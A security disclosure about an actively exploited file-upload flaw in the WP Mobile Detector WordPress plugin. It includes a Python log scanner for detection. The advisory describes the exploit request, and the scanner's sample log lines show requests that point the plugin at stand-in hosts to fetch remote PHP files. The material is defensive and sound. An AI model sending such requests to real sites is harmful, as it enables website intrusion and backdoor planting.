[Security Disclosure] WP Mobile Detector Vulnerability Being Exploited in the Wild
We are reaching out to you today because we have noticed an increase in the number of websites infected with SEO spam, and the attack vector is the WP Mobile Detector plugin. The plugin has a new zero-day vulnerability that allows an attacker to exploit an Arbitrary File Upload (AFU) flaw. The plugin has been removed from the WordPress repository and does not have an active patch available.
The zero day was disclosed May 31st, and we were able to track live attacks going back to May 27th. All customers using the Sucuri Firewall have been protected since May 27th. We have actively tested the most popular application level security plugins for WordPress and the exploits are evading their prevention controls.
The vulnerability is very easy to exploit. All the attacker needs to do is send a request to resize.php or timthumb.php (yes, timthumb; in this case it simply includes resize.php) inside the plugin directory, with the URL of the backdoor file in the request.
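As an added example (not part of the original disclosure), a small Python scanner that flags web-server access-log entries matching the request pattern described above: a hit on resize.php or timthumb.php inside the plugin directory whose query string carries a remote URL. It assumes the plugin directory slug is wp-mobile-detector; the sample log lines, the hostnames and the parameter name `param` are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache/nginx combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Assumed plugin slug; resize.php and timthumb.php are the two entry points from the advisory.
SUSPECT_PATH = re.compile(
    r'/wp-content/plugins/wp-mobile-detector/(resize|timthumb)\.php$', re.I
)
REMOTE_URL = re.compile(r'^(https?|ftp)://', re.I)


def is_mobile_detector_fetch(request_target):
    """True when the request hits one of the plugin's fetch scripts and any
    query value is a remote URL, i.e. the shape of the AFU abuse described above."""
    parts = urlsplit(request_target)
    if not SUSPECT_PATH.search(parts.path):
        return False
    # parse_qsl percent-decodes once; unquote again to catch double-encoded values.
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        if REMOTE_URL.match(unquote(value)):
            return True
    return False


def scan_log(lines):
    """Return (ip, timestamp, target, status) for every suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_mobile_detector_fetch(m['target']):
            hits.append((m['ip'], m['ts'], m['target'], m['status']))
    return hits


# Constructed sample lines (RFC 5737 test addresses, .invalid hostnames); not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [27/May/2016:10:12:01 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?param=http%3A%2F%2Fexample.invalid%2Fremote.php HTTP/1.1" 200 512',
    '198.51.100.9 - - [27/May/2016:10:12:07 +0000] "GET /wp-content/plugins/wp-mobile-detector/timthumb.php?param=https://example.invalid/x.php HTTP/1.1" 200 128',
    '192.0.2.44 - - [27/May/2016:10:13:30 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?param=image.jpg HTTP/1.1" 200 2048',
    '192.0.2.44 - - [27/May/2016:10:14:02 +0000] "GET /wp-login.php HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("suspicious plugin fetch:", hit)
```

Only the first two sample lines are reported; a local filename or a request to another path is ignored.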
It's imperative that if you are using this plugin you remove it from your environment and find a suitable replacement.
Being proactive in the protection of your site is one of the most important aspects of having a solid security posture. Therefore, we feel it's important to research and report on all potential threats as quickly as possible.